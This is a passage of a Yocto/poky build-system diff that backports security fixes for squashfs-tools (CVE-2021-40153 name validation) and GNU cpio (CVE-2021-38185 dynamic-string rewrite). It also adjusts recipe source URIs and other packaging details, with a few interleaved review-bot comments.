invalid characters in name\n"); ++ goto corrupted; ++ } ++ + TRACE("squashfs_opendir: directory entry %s, inode " + "%d:%d, type %d\n", dire->name, + dirh.start_block, dire->offset, dire->type); +diff --git a/squashfs-tools/unsquash-3.c b/squashfs-tools/unsquash-3.c +index 02c31fc5..65cfe4d9 100644 +--- a/squashfs-tools/unsquash-3.c ++++ b/squashfs-tools/unsquash-3.c +@@ -2,7 +2,7 @@ + * Unsquash a squashfs filesystem. This is a highly compressed read only + * filesystem. 
+ * +- * Copyright (c) 2009, 2010, 2011, 2012, 2013, 2019 ++ * Copyright (c) 2009, 2010, 2011, 2012, 2013, 2019, 2021 + * Phillip Lougher <phillip@squashfs.org.uk> + * + * This program is free software; you can redistribute it and/or +@@ -413,6 +413,13 @@ static struct dir *squashfs_opendir(unsigned int block_start, unsigned int offse + memcpy(dire->name, directory_table + bytes, + dire->size + 1); + dire->name[dire->size + 1] = '\0'; ++ ++ /* check name for invalid characters (i.e /, ., ..) */ ++ if(check_name(dire->name, dire->size + 1) == FALSE) { ++ ERROR("File system corrupted: invalid characters in name\n"); ++ goto corrupted; ++ } ++ + TRACE("squashfs_opendir: directory entry %s, inode " + "%d:%d, type %d\n", dire->name, + dirh.start_block, dire->offset, dire->type); +diff --git a/squashfs-tools/unsquash-4.c b/squashfs-tools/unsquash-4.c +index 8475835c..aa23a841 100644 +--- a/squashfs-tools/unsquash-4.c ++++ b/squashfs-tools/unsquash-4.c +@@ -2,7 +2,7 @@ + * Unsquash a squashfs filesystem. This is a highly compressed read only + * filesystem. + * +- * Copyright (c) 2009, 2010, 2011, 2012, 2013, 2019 ++ * Copyright (c) 2009, 2010, 2011, 2012, 2013, 2019, 2021 + * Phillip Lougher <phillip@squashfs.org.uk> + * + * This program is free software; you can redistribute it and/or +@@ -349,6 +349,13 @@ static struct dir *squashfs_opendir(unsigned int block_start, unsigned int offse + memcpy(dire->name, directory_table + bytes, + dire->size + 1); + dire->name[dire->size + 1] = '\0'; ++ ++ /* check name for invalid characters (i.e /, ., ..) 
*/ ++ if(check_name(dire->name, dire->size + 1) == FALSE) { ++ ERROR("File system corrupted: invalid characters in name\n"); ++ goto corrupted; ++ } ++ + TRACE("squashfs_opendir: directory entry %s, inode " + "%d:%d, type %d\n", dire->name, + dirh.start_block, dire->offset, dire->type); +diff --git a/squashfs-tools/unsquashfs.h b/squashfs-tools/unsquashfs.h +index 934618b2..db1da7a0 100644 +--- a/squashfs-tools/unsquashfs.h ++++ b/squashfs-tools/unsquashfs.h +@@ -4,7 +4,7 @@ + * Unsquash a squashfs filesystem. This is a highly compressed read only + * filesystem. + * +- * Copyright (c) 2009, 2010, 2013, 2014, 2019 ++ * Copyright (c) 2009, 2010, 2013, 2014, 2019, 2021 + * Phillip Lougher <phillip@squashfs.org.uk> + * + * This program is free software; you can redistribute it and/or +@@ -261,4 +261,7 @@ extern int read_ids(int, long long, long long, unsigned int **); + + /* unsquash-34.c */ + extern long long *alloc_index_table(int); ++ ++/* unsquash-1234.c */ ++extern int check_name(char *, int); + #endif diff --git a/poky/meta/recipes-devtools/squashfs-tools/squashfs-tools_git.bb b/poky/meta/recipes-devtools/squashfs-tools/squashfs-tools_git.bb index 2b1409d78d..5d754b20b3 100644 --- a/poky/meta/recipes-devtools/squashfs-tools/squashfs-tools_git.bb +++ b/poky/meta/recipes-devtools/squashfs-tools/squashfs-tools_git.bb @@ -9,8 +9,9 @@ LIC_FILES_CHKSUM = "file://../COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" PV = "4.4" SRCREV = "52eb4c279cd283ed9802dd1ceb686560b22ffb67" -SRC_URI = "git://github.com/plougher/squashfs-tools.git;protocol=https \ +SRC_URI = "git://github.com/plougher/squashfs-tools.git;protocol=https;branch=master \ file://0001-squashfs-tools-fix-build-failure-against-gcc-10.patch;striplevel=2 \ + file://CVE-2021-40153.patch;striplevel=2 \ " S = "${WORKDIR}/git/squashfs-tools" 
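Review bot: The new unsquash-1234.c defines check_name() without including unsquashfs.h, where this patch adds `extern int check_name(char *, int);`, and it defines its own `TRUE`/`FALSE`. The compiler therefore never compares the definition with the prototype the four callers use, and the Makefile rule `unsquash-1234.o: unsquash-1234.c` lists no header. Adding `#include "unsquashfs.h"` (and dropping the local defines if that header already provides them) would tie the two together. The block comment above check_name() also leaves `size` undocumented; a line such as `size is the expected length of name, excluding the terminator` would explain the final `(name - start) != size` test. As this is a backport, the change is better made upstream than in the patch.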
diff --git a/poky/meta/recipes-devtools/systemd-bootchart/systemd-bootchart_233.bb b/poky/meta/recipes-devtools/systemd-bootchart/systemd-bootchart_233.bb index aafe7c72a0..e1233ffde0 100644 --- a/poky/meta/recipes-devtools/systemd-bootchart/systemd-bootchart_233.bb +++ b/poky/meta/recipes-devtools/systemd-bootchart/systemd-bootchart_233.bb @@ -8,7 +8,7 @@ LICENSE = "LGPLv2.1 & GPLv2" LIC_FILES_CHKSUM = "file://LICENSE.LGPL2.1;md5=4fbd65380cdd255951079008b364516c \ file://LICENSE.GPL2;md5=751419260aa954499f7abaabaa882bbe" -SRC_URI = "git://github.com/systemd/systemd-bootchart.git;protocol=https \ +SRC_URI = "git://github.com/systemd/systemd-bootchart.git;protocol=https;branch=master \ file://0001-architecture-Recognise-RISCV-32-RISCV-64.patch \ file://mips64.patch \ " diff --git a/poky/meta/recipes-devtools/tcf-agent/tcf-agent_git.bb b/poky/meta/recipes-devtools/tcf-agent/tcf-agent_git.bb index 44a0d227ec..b671956cc8 100644 --- a/poky/meta/recipes-devtools/tcf-agent/tcf-agent_git.bb +++ b/poky/meta/recipes-devtools/tcf-agent/tcf-agent_git.bb @@ -10,7 +10,7 @@ SRCREV = "a022ef2f1acfd9209a1bf792dda14ae4b0d1b60f" PV = "1.7.0+git${SRCPV}" UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>(\d+(\.\d+)+))" -SRC_URI = "git://git.eclipse.org/gitroot/tcf/org.eclipse.tcf.agent \ +SRC_URI = "git://git.eclipse.org/r/tcf/org.eclipse.tcf.agent.git;protocol=https;branch=master \ file://fix_ranlib.patch \ file://ldflags.patch \ file://tcf-agent.init \ diff --git a/poky/meta/recipes-devtools/unfs3/unfs3_git.bb b/poky/meta/recipes-devtools/unfs3/unfs3_git.bb index b1882defa2..d1b3fb8f57 100644 --- a/poky/meta/recipes-devtools/unfs3/unfs3_git.bb +++ b/poky/meta/recipes-devtools/unfs3/unfs3_git.bb 
@@ -14,7 +14,7 @@ DEPENDS_append_class-nativesdk = " flex-nativesdk" ASNEEDED = "" S = "${WORKDIR}/git" -SRC_URI = "git://github.com/unfs3/unfs3.git;protocol=https \ +SRC_URI = "git://github.com/unfs3/unfs3.git;protocol=https;branch=master \ file://unfs3_parallel_build.patch \ file://alternate_rpc_ports.patch \ file://fix_pid_race_parent_writes_child_pid.patch \ diff --git a/poky/meta/recipes-devtools/valgrind/valgrind/remove-for-aarch64 b/poky/meta/recipes-devtools/valgrind/valgrind/remove-for-aarch64 index 93bfd45a4e..afa6a94825 100644 --- a/poky/meta/recipes-devtools/valgrind/valgrind/remove-for-aarch64 +++ b/poky/meta/recipes-devtools/valgrind/valgrind/remove-for-aarch64 @@ -120,6 +120,7 @@ drd/tests/tc19_shadowmem drd/tests/tc21_pthonce drd/tests/tc22_exit_w_lock drd/tests/tc23_bogus_condwait +gdbserver_tests/hginfo helgrind/tests/annotate_rwlock helgrind/tests/annotate_smart_pointer helgrind/tests/bar_bad diff --git a/poky/meta/recipes-devtools/valgrind/valgrind/remove-for-all b/poky/meta/recipes-devtools/valgrind/valgrind/remove-for-all index d6a85c4735..9b8db093df 100644 --- a/poky/meta/recipes-devtools/valgrind/valgrind/remove-for-all +++ b/poky/meta/recipes-devtools/valgrind/valgrind/remove-for-all @@ -1,2 +1,3 @@ drd/tests/bar_bad drd/tests/bar_bad_xml +gdbserver_tests/hginfo diff --git a/poky/meta/recipes-extended/asciidoc/asciidoc/detect-python-version.patch b/poky/meta/recipes-extended/asciidoc/asciidoc/detect-python-version.patch new file mode 100644 index 0000000000..14c1cd806e --- /dev/null +++ b/poky/meta/recipes-extended/asciidoc/asciidoc/detect-python-version.patch 
@@ -0,0 +1,42 @@ +From 44d2d6095246124c024230f89c1029794491839f Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Miro=20Hron=C4=8Dok?= <miro@hroncok.cz> +Date: Fri, 30 Oct 2020 15:10:35 +0100 +Subject: [PATCH] Properly detect and compare Python version 3.10+ (#151) + +Upstream commit: https://github.com/asciidoc-py/asciidoc-py/commit/44d2d6095246124c024230f89c1029794491839f + +Slightly modified to cleanly apply to asciidoc 8.6.9: +- VERSION and MIN_PYTHON_VERSION changed to reflect values in 8.6.9 +- line numbers corrected to eliminate offset warnings + +Upstream-Status: Backport +Signed-off-by: Steve Sakoman <steve@sakoman.com> + +--- + asciidoc.py | 6 +++--- + 1 file changed, 3 insertions(+), 3 deletions(-) + +diff --git a/asciidoc.py b/asciidoc.py +index f960e7d8..42868c4b 100755 +--- a/asciidoc.py ++++ b/asciidoc.py +@@ -30,7 +30,7 @@ + # Used by asciidocapi.py # + VERSION = '8.6.10' # See CHANGELOG file for version history. + +-MIN_PYTHON_VERSION = '3.4' # Require this version of Python or better. ++MIN_PYTHON_VERSION = (3, 4) # Require this version of Python or better. + + # --------------------------------------------------------------------------- + # Program constants. +@@ -4704,8 +4704,8 @@ def init(self, cmd): + directory. + cmd is the asciidoc command or asciidoc.py path. + """ +- if float(sys.version[:3]) < float(MIN_PYTHON_VERSION): +- message.stderr('FAILED: Python %s or better required' % MIN_PYTHON_VERSION) ++ if sys.version_info[:2] < MIN_PYTHON_VERSION: ++ message.stderr('FAILED: Python %d.%d or better required' % MIN_PYTHON_VERSION) + sys.exit(1) + if not os.path.exists(cmd): + message.stderr('FAILED: Missing asciidoc command: %s' % cmd) diff --git a/poky/meta/recipes-extended/asciidoc/asciidoc_8.6.9.bb b/poky/meta/recipes-extended/asciidoc/asciidoc_8.6.9.bb index 932339f739..62738dc8d9 100644 --- a/poky/meta/recipes-extended/asciidoc/asciidoc_8.6.9.bb +++ b/poky/meta/recipes-extended/asciidoc/asciidoc_8.6.9.bb 
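Review bot: `MIN_PYTHON_VERSION` changes type from a string to a tuple in the first asciidoc.py hunk, and neither hunk records why, so a later edit could easily turn it back into text. A comment on the constant would cover it: `# Tuple compared with sys.version_info[:2]; parsing sys.version[:3] as a float reads 3.10 as 3.1.` Any other reader of the constant that still expects a string lies outside the lines shown here and should be checked before the backport is relied on. `init()` continues past the end of the second hunk.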
@@ -9,7 +9,8 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=8ca43cbc842c2336e835926c2166c28b \ file://COPYRIGHT;md5=029ad5428ba5efa20176b396222d4069" SRC_URI = "git://github.com/asciidoc/asciidoc-py3;protocol=https;branch=main \ - file://auto-catalogs.patch" + file://auto-catalogs.patch \ + file://detect-python-version.patch" SRCREV = "618f6e6f6b558ed1e5f2588cd60a5a6b4f881ca0" PV .= "+py3-git${SRCPV}" diff --git a/poky/meta/recipes-extended/bash/bash.inc b/poky/meta/recipes-extended/bash/bash.inc index c7cf8cddd3..4e6176d2e6 100644 --- a/poky/meta/recipes-extended/bash/bash.inc +++ b/poky/meta/recipes-extended/bash/bash.inc @@ -49,6 +49,11 @@ do_compile_ptest () { oe_runmake buildtest } +do_install_prepend () { + # Ensure determinism as this counter increases for each make call + rm -f ${B}/.build +} + do_install_append () { # Move /usr/bin/bash to /bin/bash, if need if [ "${base_bindir}" != "${bindir}" ]; then diff --git a/poky/meta/recipes-extended/bzip2/bzip2/Makefile.am b/poky/meta/recipes-extended/bzip2/bzip2/Makefile.am index dcf64584d9..adc85a62b2 100644 --- a/poky/meta/recipes-extended/bzip2/bzip2/Makefile.am +++ b/poky/meta/recipes-extended/bzip2/bzip2/Makefile.am @@ -1,6 +1,6 @@ lib_LTLIBRARIES = libbz2.la -libbz2_la_LDFLAGS = -version-info 1:6:0 +libbz2_la_LDFLAGS = -version-info 1:8:0 libbz2_la_SOURCES = blocksort.c \ huffman.c \ diff --git a/poky/meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch b/poky/meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch new file mode 100644 index 0000000000..6ceafeee49 --- /dev/null +++ b/poky/meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch 
@@ -0,0 +1,581 @@ +GNU cpio through 2.13 allows attackers to execute arbitrary code via a crafted +pattern file, because of a dstring.c ds_fgetstr integer overflow that triggers +an out-of-bounds heap write. + +CVE: CVE-2021-38185 +Upstream-Status: Backport +Signed-off-by: Ross Burton <ross.burton@arm.com> + +From e494c68a3a0951b1eaba77e2db93f71a890e15d8 Mon Sep 17 00:00:00 2001 +From: Sergey Poznyakoff <gray@gnu.org> +Date: Sat, 7 Aug 2021 12:52:21 +0300 +Subject: [PATCH 1/3] Rewrite dynamic string support. + +* src/dstring.c (ds_init): Take a single argument. +(ds_free): New function. +(ds_resize): Take a single argument. Use x2nrealloc to expand +the storage. +(ds_reset,ds_append,ds_concat,ds_endswith): New function. +(ds_fgetstr): Rewrite. In particular, this fixes integer overflow. +* src/dstring.h (dynamic_string): Keep both the allocated length +(ds_size) and index of the next free byte in the string (ds_idx). +(ds_init,ds_resize): Change signature. +(ds_len): New macro. +(ds_free,ds_reset,ds_append,ds_concat,ds_endswith): New protos. +* src/copyin.c: Use new ds_ functions. +* src/copyout.c: Likewise. +* src/copypass.c: Likewise. +* src/util.c: Likewise. +--- + src/copyin.c | 40 +++++++++++------------ + src/copyout.c | 16 ++++----- + src/copypass.c | 34 +++++++++---------- + src/dstring.c | 88 ++++++++++++++++++++++++++++++++++++-------------- + src/dstring.h | 31 +++++++++--------- + src/util.c | 6 ++-- + 6 files changed, 123 insertions(+), 92 deletions(-) + +diff --git a/src/copyin.c b/src/copyin.c +index b29f348..37e503a 100644 +--- a/src/copyin.c ++++ b/src/copyin.c +@@ -55,11 +55,12 @@ query_rename(struct cpio_file_stat* file_hdr, FILE *tty_in, FILE *tty_out, + char *str_res; /* Result for string function. */ + static dynamic_string new_name; /* New file name for rename option. 
*/ + static int initialized_new_name = false; ++ + if (!initialized_new_name) +- { +- ds_init (&new_name, 128); +- initialized_new_name = true; +- } ++ { ++ ds_init (&new_name); ++ initialized_new_name = true; ++ } + + if (rename_flag) + { +@@ -779,37 +780,36 @@ long_format (struct cpio_file_stat *file_hdr, char const *link_name) + already in `save_patterns' (from the command line) are preserved. */ + + static void +-read_pattern_file () ++read_pattern_file (void) + { +- int max_new_patterns; +- char **new_save_patterns; +- int new_num_patterns; ++ char **new_save_patterns = NULL; ++ size_t max_new_patterns; ++ size_t new_num_patterns; + int i; +- dynamic_string pattern_name; ++ dynamic_string pattern_name = DYNAMIC_STRING_INITIALIZER; + FILE *pattern_fp; + + if (num_patterns < 0) + num_patterns = 0; +- max_new_patterns = 1 + num_patterns; +- new_save_patterns = (char **) xmalloc (max_new_patterns * sizeof (char *)); + new_num_patterns = num_patterns; +- ds_init (&pattern_name, 128); ++ max_new_patterns = num_patterns; ++ new_save_patterns = xcalloc (max_new_patterns, sizeof (new_save_patterns[0])); + + pattern_fp = fopen (pattern_file_name, "r"); + if (pattern_fp == NULL) + open_fatal (pattern_file_name); + while (ds_fgetstr (pattern_fp, &pattern_name, '\n') != NULL) + { +- if (new_num_patterns >= max_new_patterns) +- { +- max_new_patterns += 1; +- new_save_patterns = (char **) +- xrealloc ((char *) new_save_patterns, +- max_new_patterns * sizeof (char *)); +- } ++ if (new_num_patterns == max_new_patterns) ++ new_save_patterns = x2nrealloc (new_save_patterns, ++ &max_new_patterns, ++ sizeof (new_save_patterns[0])); + new_save_patterns[new_num_patterns] = xstrdup (pattern_name.ds_string); + ++new_num_patterns; + } ++ ++ ds_free (&pattern_name); ++ + if (ferror (pattern_fp) || fclose (pattern_fp) == EOF) + close_error (pattern_file_name); + +@@ -1196,7 +1196,7 @@ swab_array (char *ptr, int count) + in the file system. 
*/ + + void +-process_copy_in () ++process_copy_in (void) + { + char done = false; /* True if trailer reached. */ + FILE *tty_in = NULL; /* Interactive file for rename option. */ +diff --git a/src/copyout.c b/src/copyout.c +index 8b0beb6..26e3dda 100644 +--- a/src/copyout.c ++++ b/src/copyout.c +@@ -594,9 +594,10 @@ assign_string (char **pvar, char *value) + The format of the header depends on the compatibility (-c) flag. */ + + void +-process_copy_out () ++process_copy_out (void) + { +- dynamic_string input_name; /* Name of file read from stdin. */ ++ dynamic_string input_name = DYNAMIC_STRING_INITIALIZER; ++ /* Name of file read from stdin. */ + struct stat file_stat; /* Stat record for file. */ + struct cpio_file_stat file_hdr = CPIO_FILE_STAT_INITIALIZER; + /* Output header information. */ +@@ -605,7 +606,6 @@ process_copy_out () + char *orig_file_name = NULL; + + /* Initialize the copy out. */ +- ds_init (&input_name, 128); + file_hdr.c_magic = 070707; + + /* Check whether the output file might be a tape. */ +@@ -657,14 +657,9 @@ process_copy_out () + { + if (file_hdr.c_mode & CP_IFDIR) + { +- int len = strlen (input_name.ds_string); + /* Make sure the name ends with a slash */ +- if (input_name.ds_string[len-1] != '/') +- { +- ds_resize (&input_name, len + 2); +- input_name.ds_string[len] = '/'; +- input_name.ds_string[len+1] = 0; +- } ++ if (!ds_endswith (&input_name, '/')) ++ ds_append (&input_name, '/'); + } + } + +@@ -875,6 +870,7 @@ process_copy_out () + (unsigned long) blocks), (unsigned long) blocks); + } + cpio_file_stat_free (&file_hdr); ++ ds_free (&input_name); + } + + +diff --git a/src/copypass.c b/src/copypass.c +index dc13b5b..62f31c6 100644 +--- a/src/copypass.c ++++ b/src/copypass.c +@@ -48,10 +48,12 @@ set_copypass_perms (int fd, const char *name, struct stat *st) + If `link_flag', link instead of copying. */ + + void +-process_copy_pass () ++process_copy_pass (void) + { +- dynamic_string input_name; /* Name of file from stdin. 
*/ +- dynamic_string output_name; /* Name of new file. */ ++ dynamic_string input_name = DYNAMIC_STRING_INITIALIZER; ++ /* Name of file from stdin. */ ++ dynamic_string output_name = DYNAMIC_STRING_INITIALIZER; ++ /* Name of new file. */ + size_t dirname_len; /* Length of `directory_name'. */ + int res; /* Result of functions. */ + char *slash; /* For moving past slashes in input name. */ +@@ -65,25 +67,18 @@ process_copy_pass () + created files */ + + /* Initialize the copy pass. */ +- ds_init (&input_name, 128); + + dirname_len = strlen (directory_name); + if (change_directory_option && !ISSLASH (directory_name[0])) + { + char *pwd = xgetcwd (); +- +- dirname_len += strlen (pwd) + 1; +- ds_init (&output_name, dirname_len + 2); +- strcpy (output_name.ds_string, pwd); +- strcat (output_name.ds_string, "/"); +- strcat (output_name.ds_string, directory_name); ++ ++ ds_concat (&output_name, pwd); ++ ds_append (&output_name, '/'); + } +- else +- { +- ds_init (&output_name, dirname_len + 2); +- strcpy (output_name.ds_string, directory_name); +- } +- output_name.ds_string[dirname_len] = '/'; ++ ds_concat (&output_name, directory_name); ++ ds_append (&output_name, '/'); ++ dirname_len = ds_len (&output_name); + output_is_seekable = true; + + change_dir (); +@@ -116,8 +111,8 @@ process_copy_pass () + /* Make the name of the new file. 
*/ + for (slash = input_name.ds_string; *slash == '/'; ++slash) + ; +- ds_resize (&output_name, dirname_len + strlen (slash) + 2); +- strcpy (output_name.ds_string + dirname_len + 1, slash); ++ ds_reset (&output_name, dirname_len); ++ ds_concat (&output_name, slash); + + existing_dir = false; + if (lstat (output_name.ds_string, &out_file_stat) == 0) +@@ -333,6 +328,9 @@ process_copy_pass () + (unsigned long) blocks), + (unsigned long) blocks); + } ++ ++ ds_free (&input_name); ++ ds_free (&output_name); + } + + /* Try and create a hard link from FILE_NAME to another file +diff --git a/src/dstring.c b/src/dstring.c +index e9c063f..358f356 100644 +--- a/src/dstring.c ++++ b/src/dstring.c +@@ -20,8 +20,8 @@ + #if defined(HAVE_CONFIG_H) + # include <config.h> + #endif +- + #include <stdio.h> ++#include <stdlib.h> + #if defined(HAVE_STRING_H) || defined(STDC_HEADERS) + #include <string.h> + #else +@@ -33,24 +33,41 @@ + /* Initialiaze dynamic string STRING with space for SIZE characters. */ + + void +-ds_init (dynamic_string *string, int size) ++ds_init (dynamic_string *string) ++{ ++ memset (string, 0, sizeof *string); ++} ++ ++/* Free the dynamic string storage. */ ++ ++void ++ds_free (dynamic_string *string) + { +- string->ds_length = size; +- string->ds_string = (char *) xmalloc (size); ++ free (string->ds_string); + } + +-/* Expand dynamic string STRING, if necessary, to hold SIZE characters. */ ++/* Expand dynamic string STRING, if necessary. */ + + void +-ds_resize (dynamic_string *string, int size) ++ds_resize (dynamic_string *string) + { +- if (size > string->ds_length) ++ if (string->ds_idx == string->ds_size) + { +- string->ds_length = size; +- string->ds_string = (char *) xrealloc ((char *) string->ds_string, size); ++ string->ds_string = x2nrealloc (string->ds_string, &string->ds_size, ++ 1); + } + } + ++/* Reset the index of the dynamic string S to LEN. 
*/ ++ ++void ++ds_reset (dynamic_string *s, size_t len) ++{ ++ while (len > s->ds_size) ++ ds_resize (s); ++ s->ds_idx = len; ++} ++ + /* Dynamic string S gets a string terminated by the EOS character + (which is removed) from file F. S will increase + in size during the function if the string from F is longer than +@@ -61,34 +78,50 @@ ds_resize (dynamic_string *string, int size) + char * + ds_fgetstr (FILE *f, dynamic_string *s, char eos) + { +- int insize; /* Amount needed for line. */ +- int strsize; /* Amount allocated for S. */ + int next_ch; + + /* Initialize. */ +- insize = 0; +- strsize = s->ds_length; ++ s->ds_idx = 0; + + /* Read the input string. */ +- next_ch = getc (f); +- while (next_ch != eos && next_ch != EOF) ++ while ((next_ch = getc (f)) != eos && next_ch != EOF) + { +- if (insize >= strsize - 1) +- { +- ds_resize (s, strsize * 2 + 2); +- strsize = s->ds_length; +- } +- s->ds_string[insize++] = next_ch; +- next_ch = getc (f); ++ ds_resize (s); ++ s->ds_string[s->ds_idx++] = next_ch; + } +- s->ds_string[insize++] = '\0'; ++ ds_resize (s); ++ s->ds_string[s->ds_idx] = '\0'; + +- if (insize == 1 && next_ch == EOF) ++ if (s->ds_idx == 0 && next_ch == EOF) + return NULL; + else + return s->ds_string; + } + ++void ++ds_append (dynamic_string *s, int c) ++{ ++ ds_resize (s); ++ s->ds_string[s->ds_idx] = c; ++ if (c) ++ { ++ s->ds_idx++; ++ ds_resize (s); ++ s->ds_string[s->ds_idx] = 0; ++ } ++} ++ ++void ++ds_concat (dynamic_string *s, char const *str) ++{ ++ size_t len = strlen (str); ++ while (len + 1 > s->ds_size) ++ ds_resize (s); ++ memcpy (s->ds_string + s->ds_idx, str, len); ++ s->ds_idx += len; ++ s->ds_string[s->ds_idx] = 0; ++} ++ + char * + ds_fgets (FILE *f, dynamic_string *s) + { +@@ -100,3 +133,10 @@ ds_fgetname (FILE *f, dynamic_string *s) + { + return ds_fgetstr (f, s, '\0'); + } ++ ++/* Return true if the dynamic string S ends with character C. 
*/ ++int ++ds_endswith (dynamic_string *s, int c) ++{ ++ return (s->ds_idx > 0 && s->ds_string[s->ds_idx - 1] == c); ++} +diff --git a/src/dstring.h b/src/dstring.h +index b5135fe..f5b04ef 100644 +--- a/src/dstring.h ++++ b/src/dstring.h +@@ -17,10 +17,6 @@ + Software Foundation, Inc., 51 Franklin Street, Fifth Floor, + Boston, MA 02110-1301 USA. */ + +-#ifndef NULL +-#define NULL 0 +-#endif +- + /* A dynamic string consists of record that records the size of an + allocated string and the pointer to that string. The actual string + is a normal zero byte terminated string that can be used with the +@@ -30,22 +26,25 @@ + + typedef struct + { +- int ds_length; /* Actual amount of storage allocated. */ +- char *ds_string; /* String. */ ++ size_t ds_size; /* Actual amount of storage allocated. */ ++ size_t ds_idx; /* Index of the next free byte in the string. */ ++ char *ds_string; /* String storage. */ + } dynamic_string; + ++#define DYNAMIC_STRING_INITIALIZER { 0, 0, NULL } + +-/* Macros that look similar to the original string functions. +- WARNING: These macros work only on pointers to dynamic string records. +- If used with a real record, an "&" must be used to get the pointer. 
*/ +-#define ds_strlen(s) strlen ((s)->ds_string) +-#define ds_strcmp(s1, s2) strcmp ((s1)->ds_string, (s2)->ds_string) +-#define ds_strncmp(s1, s2, n) strncmp ((s1)->ds_string, (s2)->ds_string, n) +-#define ds_index(s, c) index ((s)->ds_string, c) +-#define ds_rindex(s, c) rindex ((s)->ds_string, c) ++void ds_init (dynamic_string *string); ++void ds_free (dynamic_string *string); ++void ds_reset (dynamic_string *s, size_t len); + +-void ds_init (dynamic_string *string, int size); +-void ds_resize (dynamic_string *string, int size); ++/* All functions below guarantee that s->ds_string[s->ds_idx] == '\0' */ + char *ds_fgetname (FILE *f, dynamic_string *s); + char *ds_fgets (FILE *f, dynamic_string *s); + char *ds_fgetstr (FILE *f, dynamic_string *s, char eos); ++void ds_append (dynamic_string *s, int c); ++void ds_concat (dynamic_string *s, char const *str); ++ ++#define ds_len(s) ((s)->ds_idx) ++ ++int ds_endswith (dynamic_string *s, int c); ++ +diff --git a/src/util.c b/src/util.c +index 4421b20..6d6bbaa 100644 +--- a/src/util.c ++++ b/src/util.c +@@ -846,11 +846,9 @@ get_next_reel (int tape_des) + FILE *tty_out; /* File for interacting with user. */ + int old_tape_des; + char *next_archive_name; +- dynamic_string new_name; ++ dynamic_string new_name = DYNAMIC_STRING_INITIALIZER; + char *str_res; + +- ds_init (&new_name, 128); +- + /* Open files for interactive communication. 
*/ + tty_in = fopen (TTY_NAME, "r"); + if (tty_in == NULL) +@@ -925,7 +923,7 @@ get_next_reel (int tape_des) + error (PAXEXIT_FAILURE, 0, _("internal error: tape descriptor changed from %d to %d"), + old_tape_des, tape_des); + +- free (new_name.ds_string); ++ ds_free (&new_name); + fclose (tty_in); + fclose (tty_out); + } +-- +2.25.1 + + +From fb7a51bf85b8e6f045cacb4fb783db4a414741bf Mon Sep 17 00:00:00 2001 +From: Sergey Poznyakoff <gray@gnu.org> +Date: Wed, 11 Aug 2021 18:10:38 +0300 +Subject: [PATCH 2/3] Fix previous commit + +* src/dstring.c (ds_reset,ds_concat): Don't call ds_resize in a +loop. +--- + src/dstring.c | 4 ++-- + 1 file changed, 2 insertions(+), 2 deletions(-) + +diff --git a/src/dstring.c b/src/dstring.c +index 358f356..90c691c 100644 +--- a/src/dstring.c ++++ b/src/dstring.c +@@ -64,7 +64,7 @@ void + ds_reset (dynamic_string *s, size_t len) + { + while (len > s->ds_size) +- ds_resize (s); ++ s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1); + s->ds_idx = len; + } + +@@ -116,7 +116,7 @@ ds_concat (dynamic_string *s, char const *str) + { + size_t len = strlen (str); + while (len + 1 > s->ds_size) +- ds_resize (s); ++ s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1); + memcpy (s->ds_string + s->ds_idx, str, len); + s->ds_idx += len; + s->ds_string[s->ds_idx] = 0; +-- +2.25.1 + + +From 86b37d74b15f9bb5fe62fd1642cc126d3ace0189 Mon Sep 17 00:00:00 2001 +From: Sergey Poznyakoff <gray@gnu.org> +Date: Wed, 18 Aug 2021 09:41:39 +0300 +Subject: [PATCH 3/3] Fix dynamic string reallocations + +* src/dstring.c (ds_resize): Take additional argument: number of +bytes to leave available after ds_idx. All uses changed. +--- + src/dstring.c | 18 ++++++++---------- + 1 file changed, 8 insertions(+), 10 deletions(-) + +diff --git a/src/dstring.c b/src/dstring.c +index 90c691c..0f597cc 100644 +--- a/src/dstring.c ++++ b/src/dstring.c +@@ -49,9 +49,9 @@ ds_free (dynamic_string *string) + /* Expand dynamic string STRING, if necessary. 
*/ + + void +-ds_resize (dynamic_string *string) ++ds_resize (dynamic_string *string, size_t len) + { +- if (string->ds_idx == string->ds_size) ++ while (len + string->ds_idx >= string->ds_size) + { + string->ds_string = x2nrealloc (string->ds_string, &string->ds_size, + 1); +@@ -63,8 +63,7 @@ ds_resize (dynamic_string *string) + void + ds_reset (dynamic_string *s, size_t len) + { +- while (len > s->ds_size) +- s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1); ++ ds_resize (s, len); + s->ds_idx = len; + } + +@@ -86,10 +85,10 @@ ds_fgetstr (FILE *f, dynamic_string *s, char eos) + /* Read the input string. */ + while ((next_ch = getc (f)) != eos && next_ch != EOF) + { +- ds_resize (s); ++ ds_resize (s, 0); + s->ds_string[s->ds_idx++] = next_ch; + } +- ds_resize (s); ++ ds_resize (s, 0); + s->ds_string[s->ds_idx] = '\0'; + + if (s->ds_idx == 0 && next_ch == EOF) +@@ -101,12 +100,12 @@ ds_fgetstr (FILE *f, dynamic_string *s, char eos) + void + ds_append (dynamic_string *s, int c) + { +- ds_resize (s); ++ ds_resize (s, 0); + s->ds_string[s->ds_idx] = c; + if (c) + { + s->ds_idx++; +- ds_resize (s); ++ ds_resize (s, 0); + s->ds_string[s->ds_idx] = 0; + } + } +@@ -115,8 +114,7 @@ void + ds_concat (dynamic_string *s, char const *str) + { + size_t len = strlen (str); +- while (len + 1 > s->ds_size) +- s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1); ++ ds_resize (s, len); + memcpy (s->ds_string + s->ds_idx, str, len); + s->ds_idx += len; + s->ds_string[s->ds_idx] = 0; +-- +2.25.1 + diff --git a/poky/meta/recipes-extended/cpio/cpio_2.13.bb b/poky/meta/recipes-extended/cpio/cpio_2.13.bb index 6536257993..7c8a465cd0 100644 --- a/poky/meta/recipes-extended/cpio/cpio_2.13.bb +++ b/poky/meta/recipes-extended/cpio/cpio_2.13.bb 
